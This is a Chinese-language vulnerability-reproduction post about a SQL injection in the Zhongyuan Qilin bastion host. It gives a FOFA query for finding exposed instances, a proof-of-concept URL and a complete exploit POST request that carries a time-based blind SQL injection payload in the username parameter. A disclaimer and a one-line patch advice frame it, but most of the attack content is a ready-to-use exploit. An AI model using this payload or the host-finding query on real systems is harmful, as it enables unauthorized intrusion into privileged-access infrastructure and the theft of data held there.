漏洞复现-中远麒麟堡垒机sql注入

免责声明：

文章中涉及的漏洞均已修复，敏感信息均已做打码处理，文章仅做经验分享用途，切勿当真，未授权的攻击属于非法行为！文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，作者不为此承担任何责任，一旦造成后果请自行负责

一：漏洞描述

中远麒麟堡垒机能够提供细粒度的访问控制,最大限度保护用户资源的安全。麒麟堡垒机存在SQL注入漏洞漏洞。

二：漏洞影响

 中远麒麟堡垒机 

三：网络空间测绘查询

fofa：cert.subject="Baolei"

四：漏洞复现

poc:

https://ip:port/admin.php?controller=admin_commonuser

出现回显，说明漏洞存在  

 exp:

 
POST /admin.php?controller=admin_commonuser HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 78
Accept: */*
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
 
username=admin' AND (SELECT * FROM (SELECT(SLEEP(5)))ptGN) AND '1'='1

五：漏洞修复建议

官方已经发布修复补丁，请进行升级。